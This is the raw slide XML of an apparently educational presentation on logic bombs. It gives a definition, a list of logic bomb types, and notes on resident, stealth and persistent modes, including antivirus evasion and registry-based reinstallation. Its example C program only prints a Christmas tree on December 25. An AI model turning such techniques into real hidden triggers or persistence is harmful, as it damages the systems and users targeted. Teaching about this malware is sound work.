                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15"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5" name="Freeform 221"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2910197" y="1278214"/>
              <a:ext cx="182495" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 14 w 28"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 28"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 14 w 28"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 28 w 28"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 14 w 28"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 14 w 28"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>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28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="28" y="6"/>
                    <a:pt x="28" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="22"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="14" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="14" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="18" y="6"/>
                    <a:pt x="14"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6" name="Freeform 222"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3252982" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>
                <a:gd name="T1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15" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15" y="6"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 223"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2490389" y="1183843"/>
              <a:ext cx="324050" cy="326134"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 50"/>
                <a:gd name="T1" fmla="*/ 48 h 48"/>
                <a:gd name="T2" fmla="*/ 10 w 50"/>
                <a:gd name="T3" fmla="*/ 47 h 48"/>
                <a:gd name="T4" fmla="*/ 9 w 50"/>
                <a:gd name="T5" fmla="*/ 44 h 48"/>
                <a:gd name="T6" fmla="*/ 11 w 50"/>
                <a:gd name="T7" fmla="*/ 30 h 48"/>
                <a:gd name="T8" fmla="*/ 1 w 50"/>
                <a:gd name="T9" fmla="*/ 21 h 48"/>
                <a:gd name="T10" fmla="*/ 1 w 50"/>
                <a:gd name="T11" fmla="*/ 18 h 48"/>
                <a:gd name="T12" fmla="*/ 3 w 50"/>
                <a:gd name="T13" fmla="*/ 16 h 48"/>
                <a:gd name="T14" fmla="*/ 17 w 50"/>
                <a:gd name="T15" fmla="*/ 14 h 48"/>
                <a:gd name="T16" fmla="*/ 23 w 50"/>
                <a:gd name="T17" fmla="*/ 2 h 48"/>
                <a:gd name="T18" fmla="*/ 28 w 50"/>
                <a:gd name="T19" fmla="*/ 2 h 48"/>
                <a:gd name="T20" fmla="*/ 34 w 50"/>
                <a:gd name="T21" fmla="*/ 14 h 48"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 16 h 48"/>
                <a:gd name="T24" fmla="*/ 50 w 50"/>
                <a:gd name="T25" fmla="*/ 18 h 48"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 21 h 48"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 30 h 48"/>
                <a:gd name="T30" fmla="*/ 42 w 50"/>
                <a:gd name="T31" fmla="*/ 44 h 48"/>
                <a:gd name="T32" fmla="*/ 41 w 50"/>
                <a:gd name="T33" fmla="*/ 47 h 48"/>
                <a:gd name="T34" fmla="*/ 37 w 50"/>
                <a:gd name="T35" fmla="*/ 47 h 48"/>
                <a:gd name="T36" fmla="*/ 25 w 50"/>
                <a:gd name="T37" fmla="*/ 41 h 48"/>
                <a:gd name="T38" fmla="*/ 13 w 50"/>
                <a:gd name="T39" fmla="*/ 47 h 48"/>
                <a:gd name="T40" fmla="*/ 12 w 50"/>
                <a:gd name="T41" fmla="*/ 48 h 48"/>
                <a:gd name="T42" fmla="*/ 25 w 50"/>
                <a:gd name="T43" fmla="*/ 34 h 48"/>
                <a:gd name="T44" fmla="*/ 27 w 50"/>
                <a:gd name="T45" fmla="*/ 35 h 48"/>
                <a:gd name="T46" fmla="*/ 35 w 50"/>
                <a:gd name="T47" fmla="*/ 39 h 48"/>
                <a:gd name="T48" fmla="*/ 33 w 50"/>
                <a:gd name="T49" fmla="*/ 30 h 48"/>
                <a:gd name="T50" fmla="*/ 34 w 50"/>
                <a:gd name="T51" fmla="*/ 27 h 48"/>
                <a:gd name="T52" fmla="*/ 41 w 50"/>
                <a:gd name="T53" fmla="*/ 21 h 48"/>
                <a:gd name="T54" fmla="*/ 32 w 50"/>
                <a:gd name="T55" fmla="*/ 20 h 48"/>
                <a:gd name="T56" fmla="*/ 29 w 50"/>
                <a:gd name="T57" fmla="*/ 18 h 48"/>
                <a:gd name="T58" fmla="*/ 25 w 50"/>
                <a:gd name="T59" fmla="*/ 10 h 48"/>
                <a:gd name="T60" fmla="*/ 21 w 50"/>
                <a:gd name="T61" fmla="*/ 18 h 48"/>
                <a:gd name="T62" fmla="*/ 19 w 50"/>
                <a:gd name="T63" fmla="*/ 20 h 48"/>
                <a:gd name="T64" fmla="*/ 10 w 50"/>
                <a:gd name="T65" fmla="*/ 21 h 48"/>
                <a:gd name="T66" fmla="*/ 17 w 50"/>
                <a:gd name="T67" fmla="*/ 27 h 48"/>
                <a:gd name="T68" fmla="*/ 17 w 50"/>
                <a:gd name="T69" fmla="*/ 30 h 48"/>
                <a:gd name="T70" fmla="*/ 16 w 50"/>
                <a:gd name="T71" fmla="*/ 39 h 48"/>
                <a:gd name="T72" fmla="*/ 24 w 50"/>
                <a:gd name="T73" fmla="*/ 35 h 48"/>
                <a:gd name="T74" fmla="*/ 25 w 50"/>
                <a:gd name="T7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48">
                  <a:moveTo>
                    <a:pt x="12" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="48"/>
                    <a:pt x="11" y="47"/>
                    <a:pt x="10" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="46"/>
                    <a:pt x="9" y="45"/>
                    <a:pt x="9" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="1" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="17"/>
                    <a:pt x="2" y="16"/>
                    <a:pt x="3" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="16"/>
                    <a:pt x="50" y="17"/>
                    <a:pt x="50" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="19"/>
                    <a:pt x="50" y="20"/>
                    <a:pt x="49" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="45"/>
                    <a:pt x="42" y="46"/>
                    <a:pt x="41" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="48"/>
                    <a:pt x="39" y="48"/>
                    <a:pt x="37" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="12" y="48"/>
                    <a:pt x="12" y="48"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="34"/>
                    <a:pt x="26" y="35"/>
                    <a:pt x="27" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="29"/>
                    <a:pt x="34" y="28"/>
                    <a:pt x="34" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="19"/>
                    <a:pt x="30" y="19"/>
                    <a:pt x="29" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="19"/>
                    <a:pt x="20" y="19"/>
                    <a:pt x="19" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="28"/>
                    <a:pt x="18" y="29"/>
                    <a:pt x="17" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="25" y="34"/>
                    <a:pt x="25" y="34"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="5C52FB"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EFB616"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="0"/>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a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>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9506485" y="4632711"/>
              <a:ext cx="1260000" cy="1260000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132205" y="1837690"/>
            <a:ext cx="9498965" cy="349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gn="just">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId14"/>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mn-ea"/>
              </a:rPr>
              <a:t>A logic bomb is a type of malicious code or software that is intentionally inserted into a computer system or network to execute a harmful action when specific conditions are met. Unlike viruses and worms, which spread and replicate, logic bombs are typically designed to be triggered based on predefined criteria or events. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="3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itchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑"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rPr>
              <a:t>Types</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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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455295" y="1216660"/>
            <a:ext cx="753491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Time-Based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Event-Based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Condition-Based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Remote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Script-Based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User-Initiated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File-Based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Operating System-Based Logic Bombs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Scripted Installers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-720090">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="300" checksum="1790709462"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Insider-Designed Logic Bombs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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itchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑"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rPr>
              <a:t>Install</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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234377d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="252730" y="1238885"/>
            <a:ext cx="11544300" cy="520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ct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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mn-ea"/>
              </a:rPr>
              <a:t>In a resident mode: the program is an active permanently in memory and may activate and operate as long as the computer is on.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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mn-ea"/>
              </a:rPr>
              <a:t>In stealth mode: the user must be kept unaware of the presence of such a program on his operating system. Other techniques may be used to fool the user and evade potential antivirus software.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>In a persistent mode: when erased or uninstalled, the infecting program manages to reinstall on the computer. The program adds one or several keys to the system registry base during the initial installation so that the potential and automatic reinstallation may take place.  At boot time, this mode also allows a malicious program to run in resident mode.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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itchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑"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rPr>
              <a:t>Example</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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768985" y="1120775"/>
            <a:ext cx="4408170" cy="5179060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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#include&lt;stdio.h&gt;</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#include&lt;ctime&gt;</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#include &lt;stdlib.h&gt;</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void show_message();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void bomb(tm* nowtime);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int main()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time_t curtime;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time(&amp;curtime);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tm* nowtime = localtime(&amp;curtime);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printf("Running program as normal...");</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bomb(nowtime);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printf("Nothing to see here...");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void show_message()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int theTree[25] = { 0, 0, 1, 1, 3, 5, 7, 9, 13, 7,</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11, 15, 19, 11, 15, 19, 11, 15,</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19, 23, 27, 6, 6, 6, 0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int len = sizeof(theTree) / sizeof(theTree[0]);</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int gap_size = 0;</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for (int i = 0; i &lt; len; i++)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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="汉仪傲娇体简" panose="02010509060101010101" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>        gap_size = int (14 - (0.5 * (i + 1)));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="汉仪傲娇体简" panose="02010509060101010101" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5614670" y="1202690"/>
            <a:ext cx="5809615" cy="5015865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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 Print spaces (gap_size number of spaces)</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for (int j = 0; j &lt; gap_size; j++)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printf("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 Print asterisks (row number of asterisks)</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for (int j = 0; j &lt; i; j++)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printf("*");</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printf("\n");</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printf("&gt;&gt;&gt;&gt;&gt; MERRY CHRISTMAS &lt;&lt;&lt;&lt;&lt;");</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printf("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exit(0);</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void bomb(tm* nowtime)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if (nowtime-&gt;tm_mon+1==12 &amp;&amp; nowtime-&gt;tm_mday==25)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show_message();</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    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="汉仪傲娇体简" panose="02010509060101010101" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="汉仪傲娇体简" panose="02010509060101010101" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="汉仪傲娇体简" panose="02010509060101010101" charset="-122"/>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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>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A728BE"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>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rgbClr val="005CA2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="3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egoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light"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egoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
